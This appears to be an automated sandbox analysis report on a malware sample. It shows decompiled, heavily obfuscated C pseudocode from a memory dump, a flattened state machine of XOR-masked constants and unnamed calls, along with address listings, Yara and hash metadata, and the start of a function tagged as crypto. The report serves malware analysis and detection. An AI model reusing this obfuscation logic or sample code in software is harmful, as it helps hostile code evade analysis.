				_v300 = _v300 ^ 0x483be800;
				_v496 = 0xece7d5;
				_v496 = _v496 >> 6;
				_v496 = _v496 + 0xd9be;
				_v496 = _v496 + 0xffff37ae;
				_v496 = _v496 ^ 0x000e7eab;
				_v140 = 0x2687b4;
				_v140 = _v140 + 0xffffd0cd;
				_v140 = _v140 ^ 0x002be321;
				_v124 = 0x67735d;
				_v124 = _v124 * 0x5f;
				_v124 = _v124 ^ 0x266d3ba3;
				_v216 = 0x2467ab;
				_v216 = _v216 / _t1262;
				_v216 = _v216 ^ 0x000e2c9c;
				_v344 = 0xa8369;
				_v344 = _v344 ^ 0x427c8ca6;
				_v344 = _v344 + 0x153;
				_v344 = _v344 ^ 0x42766412;
				_v304 = 0x20f4f1;
				_v304 = _v304 + 0xffffc5ce;
				_t1263 = 0x53;
				_v304 = _v304 / _t1263;
				_v304 = _v304 ^ 0x00008e92;
				goto L1;
				do {
					while(1) {
						L1:
						_t1401 = _t1363 - 0xaa58334;
						if(_t1401 <= 0) {
							break;
						}
						__eflags = _t1363 - 0xe36c2d0;
						if(__eflags > 0) {
							__eflags = _t1363 - 0xf81dbfa;
							if(__eflags > 0) {
								__eflags = _t1363 - 0xf9cf312;
								if(__eflags == 0) {
									__eflags = E001D2C86(_t1263, __eflags);
									if(__eflags == 0) {
										_t1363 = 0x6bdaa1b;
										goto L112;
									}
									_t1363 = 0xaa58334;
									continue;
								}
								__eflags = _t1363 - 0xfa03f19;
								if(_t1363 == 0xfa03f19) {
									E001E2244();
									_t1243 = 0x27efba3;
									_push(_t1263);
									_t1361 = E001C2C02(_v292, _v300);
									L78:
									_pop(_t1263);
									_t1363 = 0xaf5b09d;
									continue;
								}
								__eflags = _t1363 - 0xfe97f30;
								if(_t1363 != 0xfe97f30) {
									goto L112;
								}
								_t1171 = E001D52D1();
								_t1363 = 0x6441de0;
								continue;
							}
							if(__eflags == 0) {
								_t1171 = E001E2244();
								__eflags = _t1171;
								if(__eflags == 0) {
									L64:
									return _t1171;
								}
								_t1363 = 0xf7027df;
								continue;
							}
							__eflags = _t1363 - 0xe6e64c4;
							if(_t1363 == 0xe6e64c4) {
								_t1171 = E001CA92F();
								_t1363 = 0x7cc9194;
								continue;
							}
							__eflags = _t1363 - 0xe7d2485;
							if(_t1363 == 0xe7d2485) {
								_t1208 = E001DCD2C();
								_t1263 =  &_v104;
								_t1171 = E001D89A2(_t1263, _v212, _t1408, _t1208, _v220, _v228, _v236, _v456,  &_v96);
								_t1394 = _t1394 + 0x18;
								asm("sbb esi, esi");
								_t1363 = ( ~_t1171 & 0xfed9fe75) + 0xe7d2485;
								continue;
							}
							__eflags = _t1363 - 0xf612bd7;
							if(__eflags == 0) {
								_t1363 = 0xf9cf312;
								continue;
							}
							__eflags = _t1363 - 0xf7027df;
							if(_t1363 != 0xf7027df) {
								goto L112;
							}
							_t1171 = E001D10CD();
							__eflags = _t1171;
							if(__eflags == 0) {
								goto L64;
							}
							_t1363 = 0x1c76b4f;
							continue;
						}
						if(__eflags == 0) {
							_t1171 = E001D4C20();
							__eflags = _t1171;
							if(__eflags == 0) {
								_t1171 = E001D590E();
							}
							L81:
							_t1363 = 0x8eff62f;
							continue;
						}
						__eflags = _t1363 - 0xc18aaa2;
						if(__eflags > 0) {
							__eflags = _t1363 - 0xc29a4c8;
							if(__eflags == 0) {
								_t1171 = _v340;
								_t1363 = 0x434d78a;
								_v84 = _t1171;
								continue;
							}
							__eflags = _t1363 - 0xc80f471;
							if(_t1363 == 0xc80f471) {
								_t1171 = E001C736A();
								_t1363 = 0xbef31e9;
								continue;
							}
							__eflags = _t1363 - 0xd5722fa;
							if(_t1363 == 0xd5722fa) {
								_t1215 = E001C51EC( &_v36,  &_v96, _v184, _v364);
								_pop(_t1263);
								__eflags = _t1215;
								if(_t1215 != 0) {
									_t1171 = _v32;
									__eflags = _t1171 - 8;
									if(__eflags != 0) {
										__eflags = _t1171;
										if(__eflags == 0) {
											L86:
											_t1363 = 0x590cd26;
											continue;
										}
										__eflags = _t1171 - 1;
										if(__eflags != 0) {
											goto L81;
										}
										goto L86;
									}
									_t1363 = 0xa21c0cf;
									continue;
								}
								_t1171 = E001C2C02(_v496, _v124);
								_t1263 = _t1263;
								_t1361 = _t1171;
								_t1243 = 0x434d78a;
								goto L81;
							}
							__eflags = _t1363 - 0xd66928b;
							if(_t1363 != 0xd66928b) {
								goto L112;
							}
							_t1171 = E001CAE43(_v104, _v144, _v504);
							goto L78;
						}
						if(__eflags == 0) {
							_t1171 = E001C19C0();
							_t1363 = 0x6cb694;
							continue;
						}
						__eflags = _t1363 - 0xaf41e4a;
						if(_t1363 == 0xaf41e4a) {
							_t1171 = E001DDDA5();
							_v48 = _t1171;
							_t1363 = 0x70f7fca;
							continue;
						}
						__eflags = _t1363 - 0xaf5b09d;
						if(_t1363 == 0xaf5b09d) {
							__eflags = _t1361 - _v552;
							if(_t1361 == _v552) {
								L70:
								_t1363 = _t1243;
								goto L112;
							}
							_t1171 = E001DBDFB(_t1361, _v536, _v544, E001DCD2C());
							_pop(_t1263);
							__eflags = _t1171 - _v372;
							if(__eflags == 0) {
								_t1171 = E001DBF0C();
								goto L70;
							}
							_t1363 = 0x2c30a4e;
							continue;
						}
						__eflags = _t1363 - 0xb2eac18;
						if(_t1363 == 0xb2eac18) {
							E001C243F();
							_t1171 = E001D4C20();
							asm("sbb esi, esi");
							_t1363 = ( ~_t1171 & 0xf73dd2ef) + 0xc80f471;
							continue;
						}
						__eflags = _t1363 - 0xbef31e9;
						if(_t1363 != 0xbef31e9) {
							goto L112;
						}
						_t1171 = E001D40FE(_v432, _v424, _v276, _v284);
						goto L64;
					}
					if(_t1401 == 0) {
						_t1171 = E001C7EE7();
						_t1363 = 0x8ed2746;
						goto L1;
					}
					_t1402 = _t1363 - 0x5716cb5;
					if(_t1402 > 0) {
						__eflags = _t1363 - 0x895cfe1;
						if(__eflags > 0) {
							__eflags = _t1363 - 0x8ed2746;
							if(_t1363 == 0x8ed2746) {
								_t1171 = E001C9824();
								__eflags = _t1171;
								if(__eflags == 0) {
									goto L64;
								}
								_t1363 = 0xf81dbfa;
								goto L1;
							}
							__eflags = _t1363 - 0x8eff62f;
							if(_t1363 == 0x8eff62f) {
								_t1171 = E001CAE43(_v96, _v576, _v584);
								_pop(_t1263);
								_t1363 = 0xd66928b;
								goto L1;
							}
							__eflags = _t1363 - 0x967876a;
							if(_t1363 == 0x967876a) {
								_t1171 = E001CF48A();
								_v72 = _t1171;
								_t1363 = 0xaf41e4a;
								goto L1;
							}
							__eflags = _t1363 - 0xa21c0cf;
							if(_t1363 != 0xa21c0cf) {
								goto L112;
							}
							_t1171 = E001D3043();
							goto L64;
						}
						if(__eflags == 0) {
							__eflags = E001D3782();
							if(__eflags == 0) {
								_t1171 = E001D4C20();
								asm("sbb esi, esi");
								_t1363 = ( ~_t1171 & 0x09a56150) + 0x6441de0;
								goto L1;
							}
							_t1171 = E001D4C20();
							asm("sbb esi, esi");
							_t1376 =  ~_t1171 & 0xf4af45bd;
							L24:
							_t1363 = _t1376 + 0xe6e64c4;
							goto L1;
						}
						__eflags = _t1363 - 0x590cd26;
						if(_t1363 == 0x590cd26) {
							_t1263 = _v524;
							_t1171 = E001E1CDB( &_v12, _v444, _v360, _v224);
							_t1394 = _t1394 + 0xc;
							__eflags = _t1171;
							if(__eflags == 0) {
								_t1171 = _v32;
								__eflags = _t1171;
								if(_t1171 == 0) {
									E001C2C02(_v140, _v216);
									_t1171 = _v32;
									_t1263 = _t1263;
								}
								__eflags = _t1171 - 1;
								if(__eflags == 0) {
									_t1171 = E001C2C02(_v344, _v304);
									_t1263 = _t1263;
								}
							}
							_t1363 = 0xe36c2d0;
							goto L1;
						}
						__eflags = _t1363 - 0x6441de0;
						if(_t1363 == 0x6441de0) {
							_t1171 = E001C4D1E();
							_t1363 = 0xc18aaa2;
							goto L1;
						}
						__eflags = _t1363 - 0x70f7fca;
						if(__eflags == 0) {
							_t1171 = _v368;
							_t1363 = 0xc29a4c8;
							_v68 = _t1171;
							goto L1;
						}
						__eflags = _t1363 - 0x7cc9194;
						if(_t1363 != 0x7cc9194) {
							goto L112;
						}
						_t1171 = E001CAA4E();
						_t1363 = 0x178de16;
						goto L1;
					}
					if(_t1402 == 0) {
						_t1171 = E001C73BC();
						_v60 = _t1171;
						_t1363 = 0x967876a;
						goto L1;
					}
					_t1403 = _t1363 - 0x27efba3;
					if(_t1403 > 0) {
						__eflags = _t1363 - 0x2c30a4e;
						if(_t1363 == 0x2c30a4e) {
							_t1171 = E001DE579(_t1263);
							goto L64;
						}
						__eflags = _t1363 - 0x31daa81;
						if(_t1363 == 0x31daa81) {
							_t1171 = E001CA083();
							asm("sbb esi, esi");
							_t1376 =  ~_t1171 & 0xfd80cd25;
							__eflags = _t1376;
							goto L24;
						}
						__eflags = _t1363 - 0x3bec760;
						if(_t1363 == 0x3bec760) {
							_t1171 = E001C59BF();
							_t1363 = 0xc80f471;
							goto L1;
						}
						__eflags = _t1363 - 0x434d78a;
						if(_t1363 != 0x434d78a) {
							goto L112;
						}
						_t1171 = E001E2BE6(_v548,  &_v56, _v492, _v128);
						_pop(_t1263);
						_t1363 = 0xaf8f9d;
						goto L1;
					}
					if(_t1403 == 0) {
						_v80 = E001E2AB2();
						_t1171 = E001E2EE9(_v320, _v556, _v384, _t1191);
						_pop(_t1263);
						_v76 = _t1171;
						_t1363 = 0x5716cb5;
						goto L1;
					}
					if(_t1363 == 0x6cb694) {
						_t1171 = E001C92C1();
						__eflags = _t1171;
						if(__eflags == 0) {
							goto L64;
						}
						_t1363 = 0xb2eac18;
						goto L1;
					}
					if(_t1363 == 0xaf8f9d) {
						_t1263 = _v436;
						_t1171 = E001D970A(_t1263,  &_v88,  &_v104, _v232, _v168);
						_t1394 = _t1394 + 0xc;
						asm("sbb esi, esi");
						_t1363 = ( ~_t1171 & 0x011691fa) + 0xd66928b;
						goto L1;
					}
					if(_t1363 == 0x178de16) {
						_v112 = E001DE899(_v508, 0x1c150c, __eflags,  &_v108, _v268, _v280);
						_v120 = E001DE899(_v336, 0x1c157c, __eflags,  &_v116, _v260, _v148);
						_t1199 = E001CB191( &_v112, _v468, _v408, _v580,  &_v120);
						asm("sbb esi, esi");
						_t1363 = ( ~_t1199 & 0x08e294fe) + 0x6bdaa1b;
						E001D629F(_v248, _v120, _v400, _v572, _v296);
						_t1263 = _v564;
						_t1171 = E001D629F(_t1263, _v112, _v240, _v500, _v136);
						_t1394 = _t1394 + 0x3c;
						goto L112;
					}
					if(_t1363 == 0x1c76b4f) {
						_t1171 = E001D3D0C();
						asm("sbb esi, esi");
						_t1363 = ( ~_t1171 & 0x0382dac1) + 0x895cfe1;
						goto L1;
					}
					L112:
					__eflags = _t1363 - 0x6bdaa1b;
				} while (__eflags != 0);
				goto L64;
			}















































































































































































                          0x001ccf6e
                          0x001ccf74
                          0x001ccf7a
                          0x001ccf87
                          0x001ccf92
                          0x001ccf9d
                          0x001ccfa8
                          0x001ccfba
                          0x001ccfbf
                          0x001ccfc8
                          0x001ccfd0
                          0x001ccfd5
                          0x001ccfe0
                          0x001ccfeb
                          0x001ccff3
                          0x001ccffb
                          0x001cd000
                          0x001cd008
                          0x001cd010
                          0x001cd01b
                          0x001cd026
                          0x001cd031
                          0x001cd043
                          0x001cd048
                          0x001cd051
                          0x001cd05c
                          0x001cd067
                          0x001cd072
                          0x001cd07d
                          0x001cd088
                          0x001cd093
                          0x001cd09e
                          0x001cd0a6
                          0x001cd0b1
                          0x001cd0bc
                          0x001cd0c7
                          0x001cd0da
                          0x001cd0db
                          0x001cd0e2
                          0x001cd0ed
                          0x001cd0f8
                          0x001cd100
                          0x001cd10b
                          0x001cd11e
                          0x001cd125
                          0x001cd130
                          0x001cd144
                          0x001cd14b
                          0x001cd156
                          0x001cd161
                          0x001cd16c
                          0x001cd177
                          0x001cd182
                          0x001cd18a
                          0x001cd195
                          0x001cd1a0
                          0x001cd1ab
                          0x001cd1bb
                          0x001cd1c2
                          0x001cd1cd
                          0x001cd1d8
                          0x001cd1e3
                          0x001cd1ee
                          0x001cd1f9
                          0x001cd201
                          0x001cd20b
                          0x001cd210
                          0x001cd218
                          0x001cd220
                          0x001cd22b
                          0x001cd233
                          0x001cd23b
                          0x001cd246
                          0x001cd251
                          0x001cd25c
                          0x001cd264
                          0x001cd26c
                          0x001cd277
                          0x001cd28b
                          0x001cd290
                          0x001cd299
                          0x001cd2a4
                          0x001cd2af
                          0x001cd2be
                          0x001cd2c3
                          0x001cd2cc
                          0x001cd2d7
                          0x001cd2df
                          0x001cd2eb
                          0x001cd2f0
                          0x001cd2fb
                          0x001cd2fe
                          0x001cd302
                          0x001cd30a
                          0x001cd320
                          0x001cd327
                          0x001cd332
                          0x001cd33d
                          0x001cd34c
                          0x001cd34f
                          0x001cd356
                          0x001cd361
                          0x001cd36e
                          0x001cd372
                          0x001cd37a
                          0x001cd37f
                          0x001cd387
                          0x001cd38f
                          0x001cd397
                          0x001cd39f
                          0x001cd3a7
                          0x001cd3af
                          0x001cd3ba
                          0x001cd3c5
                          0x001cd3d0
                          0x001cd3db
                          0x001cd3e6
                          0x001cd3ee
                          0x001cd3f9
                          0x001cd401
                          0x001cd409
                          0x001cd411
                          0x001cd419
                          0x001cd421
                          0x001cd42b
                          0x001cd439
                          0x001cd43e
                          0x001cd444
                          0x001cd449
                          0x001cd451
                          0x001cd45c
                          0x001cd46f
                          0x001cd472
                          0x001cd481
                          0x001cd488
                          0x001cd493
                          0x001cd4a9
                          0x001cd4b0
                          0x001cd4bb
                          0x001cd4c6
                          0x001cd4d9
                          0x001cd4da
                          0x001cd4e1
                          0x001cd4e9
                          0x001cd4f4
                          0x001cd4ff
                          0x001cd512
                          0x001cd519
                          0x001cd524
                          0x001cd52f
                          0x001cd536
                          0x001cd541
                          0x001cd549
                          0x001cd54e
                          0x001cd556
                          0x001cd55b
                          0x001cd563
                          0x001cd56b
                          0x001cd573
                          0x001cd57b
                          0x001cd580
                          0x001cd588
                          0x001cd590
                          0x001cd598
                          0x001cd5a6
                          0x001cd5aa
                          0x001cd5b2
                          0x001cd5bd
                          0x001cd5c5
                          0x001cd5d0
                          0x001cd5db
                          0x001cd5ee
                          0x001cd5f5
                          0x001cd600
                          0x001cd60b
                          0x001cd616
                          0x001cd621
                          0x001cd629
                          0x001cd634
                          0x001cd63f
                          0x001cd647
                          0x001cd652
                          0x001cd65d
                          0x001cd670
                          0x001cd677
                          0x001cd682
                          0x001cd699
                          0x001cd69a
                          0x001cd6a1
                          0x001cd6ac
                          0x001cd6b7
                          0x001cd6c2
                          0x001cd6cd
                          0x001cd6d8
                          0x001cd6e0
                          0x001cd6eb
                          0x001cd6f3
                          0x001cd6fd
                          0x001cd701
                          0x001cd706
                          0x001cd70e
                          0x001cd719
                          0x001cd721
                          0x001cd72c
                          0x001cd737
                          0x001cd742
                          0x001cd74d
                          0x001cd758
                          0x001cd760
                          0x001cd768
                          0x001cd770
                          0x001cd778
                          0x001cd780
                          0x001cd796
                          0x001cd79d
                          0x001cd7a8
                          0x001cd7b3
                          0x001cd7c0
                          0x001cd7c4
                          0x001cd7cc
                          0x001cd7d4
                          0x001cd7dc
                          0x001cd7e7
                          0x001cd7ef
                          0x001cd7fa
                          0x001cd802
                          0x001cd80a
                          0x001cd80f
                          0x001cd817
                          0x001cd81f
                          0x001cd82a
                          0x001cd835
                          0x001cd840
                          0x001cd84b
                          0x001cd853
                          0x001cd85b
                          0x001cd866
                          0x001cd871
                          0x001cd879
                          0x001cd884
                          0x001cd88f
                          0x001cd897
                          0x001cd8a2
                          0x001cd8b5
                          0x001cd8c5
                          0x001cd8cc
                          0x001cd8d7
                          0x001cd8e2
                          0x001cd8ed
                          0x001cd8f5
                          0x001cd900
                          0x001cd90b
                          0x001cd916
                          0x001cd921
                          0x001cd92c
                          0x001cd937
                          0x001cd942
                          0x001cd94f
                          0x001cd95a
                          0x001cd968
                          0x001cd96d
                          0x001cd973
                          0x001cd97b
                          0x001cd980
                          0x001cd988
                          0x001cd993
                          0x001cd9a6
                          0x001cd9a9
                          0x001cd9b0
                          0x001cd9bb
                          0x001cd9c3
                          0x001cd9c8
                          0x001cd9d0
                          0x001cd9d8
                          0x001cd9e0
                          0x001cd9e8
                          0x001cd9ed
                          0x001cd9f1
                          0x001cd9fe
                          0x001cda02
                          0x001cda0a
                          0x001cda1d
                          0x001cda1e
                          0x001cda25
                          0x001cda2d
                          0x001cda38
                          0x001cda43
                          0x001cda4e
                          0x001cda55
                          0x001cda60
                          0x001cda68
                          0x001cda6d
                          0x001cda72
                          0x001cda7a
                          0x001cda82
                          0x001cda90
                          0x001cda94
                          0x001cdaa1
                          0x001cdaa5
                          0x001cdaad
                          0x001cdab8
                          0x001cdac0
                          0x001cdacb
                          0x001cdad6
                          0x001cdade
                          0x001cdaee
                          0x001cdaf5
                          0x001cdb00
                          0x001cdb0b
                          0x001cdb13
                          0x001cdb1e
                          0x001cdb29
                          0x001cdb34
                          0x001cdb3f
                          0x001cdb4a
                          0x001cdb55
                          0x001cdb60
                          0x001cdb6b
                          0x001cdb76
                          0x001cdb81
                          0x001cdb8c
                          0x001cdb97
                          0x001cdba4
                          0x001cdbaf
                          0x001cdbc3
                          0x001cdbc8
                          0x001cdbd1
                          0x001cdbdc
                          0x001cdbe7
                          0x001cdbf2
                          0x001cdbfd
                          0x001cdc08
                          0x001cdc13
                          0x001cdc1e
                          0x001cdc29
                          0x001cdc31
                          0x001cdc3c
                          0x001cdc44
                          0x001cdc4f
                          0x001cdc5a
                          0x001cdc65
                          0x001cdc70
                          0x001cdc7b
                          0x001cdc8d
                          0x001cdc90
                          0x001cdc97
                          0x001cdca2
                          0x001cdcad
                          0x001cdcb5
                          0x001cdcc0
                          0x001cdccb
                          0x001cdcd6
                          0x001cdcde
                          0x001cdce9
                          0x001cdcf4
                          0x001cdcfc
                          0x001cdd01
                          0x001cdd09
                          0x001cdd11
                          0x001cdd19
                          0x001cdd24
                          0x001cdd2c
                          0x001cdd3f
                          0x001cdd46
                          0x001cdd51
                          0x001cdd64
                          0x001cdd6b
                          0x001cdd76
                          0x001cdd81
                          0x001cdd94
                          0x001cdd9b
                          0x001cdda6
                          0x001cddb1
                          0x001cddb9
                          0x001cddc4
                          0x001cddcf
                          0x001cddd7
                          0x001cddde
                          0x001cdde9
                          0x001cddf4
                          0x001cddff
                          0x001cde0a
                          0x001cde15
                          0x001cde25
                          0x001cde2c
                          0x001cde37
                          0x001cde42
                          0x001cde4a
                          0x001cde55
                          0x001cde60
                          0x001cde6b
                          0x001cde78
                          0x001cde83
                          0x001cde8e
                          0x001cde99
                          0x001cdea4
                          0x001cdeaf
                          0x001cdeb7
                          0x001cdebc
                          0x001cdeca
                          0x001cdecf
                          0x001cded3
                          0x001cdedb
                          0x001cdee3
                          0x001cdeeb
                          0x001cdef3
                          0x001cdef8
                          0x001cdf00
                          0x001cdf0b
                          0x001cdf16
                          0x001cdf21
                          0x001cdf29
                          0x001cdf2e
                          0x001cdf33
                          0x001cdf3b
                          0x001cdf43
                          0x001cdf4e
                          0x001cdf59
                          0x001cdf64
                          0x001cdf6f
                          0x001cdf85
                          0x001cdf97
                          0x001cdfa0
                          0x001cdfab
                          0x001cdfb3
                          0x001cdfb8
                          0x001cdfc0
                          0x001cdfc8
                          0x001cdfd0
                          0x001cdfd8
                          0x001cdfdd
                          0x001cdfe2
                          0x001cdfe7
                          0x001cdfef
                          0x001cdff7
                          0x001cdfff
                          0x001ce007
                          0x001ce00f
                          0x001ce017
                          0x001ce01f
                          0x001ce027
                          0x001ce02f
                          0x001ce037
                          0x001ce03f
                          0x001ce04a
                          0x001ce055
                          0x001ce060
                          0x001ce06b
                          0x001ce076
                          0x001ce081
                          0x001ce08c
                          0x001ce097
                          0x001ce0a9
                          0x001ce0ac
                          0x001ce0b3
                          0x001ce0be
                          0x001ce0db
                          0x001ce0e0
                          0x001ce0e9
                          0x001ce0f6
                          0x001ce101
                          0x001ce113
                          0x001ce118
                          0x001ce121
                          0x001ce12c
                          0x001ce137
                          0x001ce150
                          0x001ce15b
                          0x001ce166
                          0x001ce179
                          0x001ce183
                          0x001ce18a
                          0x001ce195
                          0x001ce1a8
                          0x001ce1b7
                          0x001ce1be
                          0x001ce1c9
                          0x001ce1d1
                          0x001ce1d6
                          0x001ce1de
                          0x001ce1e6
                          0x001ce1ee
                          0x001ce1f9
                          0x001ce204
                          0x001ce20f
                          0x001ce222
                          0x001ce229
                          0x001ce234
                          0x001ce24a
                          0x001ce251
                          0x001ce25c
                          0x001ce267
                          0x001ce272
                          0x001ce27d
                          0x001ce288
                          0x001ce293
                          0x001ce2a5
                          0x001ce2a8
                          0x001ce2af
                          0x001ce2af
                          0x001ce2ba
                          0x001ce2ba
                          0x001ce2ba
                          0x001ce2ba
                          0x001ce2c0
                          0x00000000
                          0x00000000
                          0x001ce7a0
                          0x001ce7a6
                          0x001ce9f2
                          0x001ce9f8
                          0x001ceafb
                          0x001ceb01
                          0x001ceb77
                          0x001ceb79
                          0x001ceb85
                          0x00000000
                          0x001ceb85
                          0x001ceb7b
                          0x00000000
                          0x001ceb7b
                          0x001ceb03
                          0x001ceb09
                          0x001ceb37
                          0x001ceb43
                          0x001ceb4f
                          0x001ceb64
                          0x001ce914
                          0x001ce914
                          0x001ce915
                          0x00000000
                          0x001ce915
                          0x001ceb0b
                          0x001ceb11
                          0x00000000
                          0x00000000
                          0x001ceb1a
                          0x001ceb1f
                          0x00000000
                          0x001ceb1f
                          0x001ce9fe
                          0x001ceae4
                          0x001ceae9
                          0x001ceaeb
                          0x001ce810
                          0x001ce817
                          0x001ce817
                          0x001ceaf1
                          0x00000000
                          0x001ceaf1
                          0x001cea04
                          0x001cea0a
                          0x001ceac7
                          0x001ceacc
                          0x00000000
                          0x001ceacc
                          0x001cea10
                          0x001cea16
                          0x001cea69
                          0x001cea7d
                          0x001ceaa1
                          0x001ceaa6
                          0x001ceaad
                          0x001ceab5
                          0x00000000
                          0x001ceab5
                          0x001cea18
                          0x001cea1e
                          0x001cea51
                          0x00000000
                          0x001cea51
                          0x001cea20
                          0x001cea26
                          0x00000000
                          0x00000000
                          0x001cea3a
                          0x001cea3f
                          0x001cea41
                          0x00000000
                          0x00000000
                          0x001cea47
                          0x00000000
                          0x001cea47
                          0x001ce7ac
                          0x001ce9d8
                          0x001ce9dd
                          0x001ce9df
                          0x001ce9e8
                          0x001ce9e8
                          0x001ce96b
                          0x001ce96b
                          0x00000000
                          0x001ce96b
                          0x001ce7b2
                          0x001ce7b8
                          0x001ce8d1
                          0x001ce8d7
                          0x001ce9b5
                          0x001ce9bc
                          0x001ce9be
                          0x00000000
                          0x001ce9be
                          0x001ce8dd
                          0x001ce8e3
                          0x001ce9a6
                          0x001ce9ab
                          0x00000000
                          0x001ce9ab
                          0x001ce8e9
                          0x001ce8ef
                          0x001ce93b
                          0x001ce941
                          0x001ce942
                          0x001ce944
                          0x001ce975
                          0x001ce97c
                          0x001ce97f
                          0x001ce98b
                          0x001ce98d
                          0x001ce994
                          0x001ce994
                          0x00000000
                          0x001ce994
                          0x001ce98f
                          0x001ce992
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001ce992
                          0x001ce981
                          0x00000000
                          0x001ce981
                          0x001ce960
                          0x001ce966
                          0x001ce967
                          0x001ce969
                          0x00000000
                          0x001ce969
                          0x001ce8f1
                          0x001ce8f7
                          0x00000000
                          0x00000000
                          0x001ce90f
                          0x00000000
                          0x001ce90f
                          0x001ce7be
                          0x001ce8c2
                          0x001ce8c7
                          0x00000000
                          0x001ce8c7
                          0x001ce7c4
                          0x001ce7ca
                          0x001ce8a1
                          0x001ce8a6
                          0x001ce8ad
                          0x00000000
                          0x001ce8ad
                          0x001ce7d0
                          0x001ce7d6
                          0x001ce848
                          0x001ce84c
                          0x001ce893
                          0x001ce893
                          0x00000000
                          0x001ce893
                          0x001ce86c
                          0x001ce872
                          0x001ce873
                          0x001ce87a
                          0x001ce88e
                          0x00000000
                          0x001ce88e
                          0x001ce87c
                          0x00000000
                          0x001ce87c
                          0x001ce7d8
                          0x001ce7de
                          0x001ce81c
                          0x001ce82c
                          0x001ce835
                          0x001ce83d
                          0x00000000
                          0x001ce83d
                          0x001ce7e0
                          0x001ce7e6
                          0x00000000
                          0x00000000
                          0x001ce808
                          0x00000000
                          0x001ce80d
                          0x001ce2c6
                          0x001ce791
                          0x001ce796
                          0x00000000
                          0x001ce796
                          0x001ce2cc
                          0x001ce2d2
                          0x001ce576
                          0x001ce57c
                          0x001ce6f0
                          0x001ce6f6
                          0x001ce773
                          0x001ce778
                          0x001ce77a
                          0x00000000
                          0x00000000
                          0x001ce780
                          0x00000000
                          0x001ce780
                          0x001ce6f8
                          0x001ce6fe
                          0x001ce75c
                          0x001ce761
                          0x001ce762
                          0x00000000
                          0x001ce762
                          0x001ce700
                          0x001ce706
                          0x001ce737
                          0x001ce73c
                          0x001ce743
                          0x00000000
                          0x001ce743
                          0x001ce708
                          0x001ce70e
                          0x00000000
                          0x00000000
                          0x001ce722
                          0x00000000
                          0x001ce722
                          0x001ce582
                          0x001ce6a1
                          0x001ce6a3
                          0x001ce6d4
                          0x001ce6dd
                          0x001ce6e5
                          0x00000000
                          0x001ce6e5
                          0x001ce6b3
                          0x001ce6bc
                          0x001ce6be
                          0x001ce551
                          0x001ce551
                          0x00000000
                          0x001ce551
                          0x001ce588
                          0x001ce58e
                          0x001ce60d
                          0x001ce611
                          0x001ce616
                          0x001ce619
                          0x001ce61b
                          0x001ce626
                          0x001ce62d
                          0x001ce62f
                          0x001ce64e
                          0x001ce656
                          0x001ce65d
                          0x001ce65d
                          0x001ce65e
                          0x001ce661
                          0x001ce680
                          0x001ce686
                          0x001ce687
                          0x001ce661
                          0x001ce68b
                          0x00000000
                          0x001ce68b
                          0x001ce590
                          0x001ce596
                          0x001ce5e2
                          0x001ce5e7
                          0x00000000
                          0x001ce5e7
                          0x001ce598
                          0x001ce59e
                          0x001ce5c3
                          0x001ce5ca
                          0x001ce5cf
                          0x00000000
                          0x001ce5cf
                          0x001ce5a0
                          0x001ce5a6
                          0x00000000
                          0x00000000
                          0x001ce5b4
                          0x001ce5b9
                          0x00000000
                          0x001ce5b9
                          0x001ce2d8
                          0x001ce560
                          0x001ce565
                          0x001ce56c
                          0x00000000
                          0x001ce56c
                          0x001ce2de
                          0x001ce2e4
                          0x001ce4d1
                          0x001ce4d7
                          0x001ceba2
                          0x00000000
                          0x001ceba2
                          0x001ce4dd
                          0x001ce4e3
                          0x001ce540
                          0x001ce549
                          0x001ce54b
                          0x001ce54b
                          0x00000000
                          0x001ce54b
                          0x001ce4e5
                          0x001ce4eb
                          0x001ce523
                          0x001ce528
                          0x00000000
                          0x001ce528
                          0x001ce4ed
                          0x001ce4ef
                          0x00000000
                          0x00000000
                          0x001ce50b
                          0x001ce511
                          0x001ce512
                          0x00000000
                          0x001ce512
                          0x001ce2ea
                          0x001ce4b2
                          0x001ce4b9
                          0x001ce4bf
                          0x001ce4c0
                          0x001ce4c7
                          0x00000000
                          0x001ce4c7
                          0x001ce2f6
                          0x001ce475
                          0x001ce47a
                          0x001ce47c
                          0x00000000
                          0x00000000
                          0x001ce482
                          0x00000000
                          0x001ce482
                          0x001ce302
                          0x001ce440
                          0x001ce44f
                          0x001ce454
                          0x001ce45b
                          0x001ce463
                          0x00000000
                          0x001ce463
                          0x001ce30e
                          0x001ce366
                          0x001ce397
                          0x001ce3bf
                          0x001ce3cb
                          0x001ce3de
                          0x001ce3f9
                          0x001ce41a
                          0x001ce41e
                          0x001ce423
                          0x00000000
                          0x001ce423
                          0x001ce316
                          0x001ce323
                          0x001ce32c
                          0x001ce334
                          0x00000000
                          0x001ce334
                          0x001ceb8a
                          0x001ceb8a
                          0x001ceb8a
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: On$!+$#oT$$cP$(<$(M&$2=q$;#$;-r$;O\$O=/{$P8$PV$S4$Xr$]sg$p3%$tfZ$x1L$yT$yd$"R$`o$|$[a
                          • API String ID: 0-2511783560
                          • Opcode ID: 87f90bbc760ab1f7c7381c5073c14e14ec8bfe17320c7e03574ee7af4a8785ab
                          • Instruction ID: 64af27b6dc42fc55bd7b6ea55086cb2485707820d8c323d05c713b6ac188d682
                          • Opcode Fuzzy Hash: 87f90bbc760ab1f7c7381c5073c14e14ec8bfe17320c7e03574ee7af4a8785ab
                          • Instruction Fuzzy Hash: 99D212719093818BD378DF25C58ABCBBBE1BBE5314F11891DE5CA96260D7B08949CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D7445, Relevance: 26.9, Strings: 21, Instructions: 669COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001D7445(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
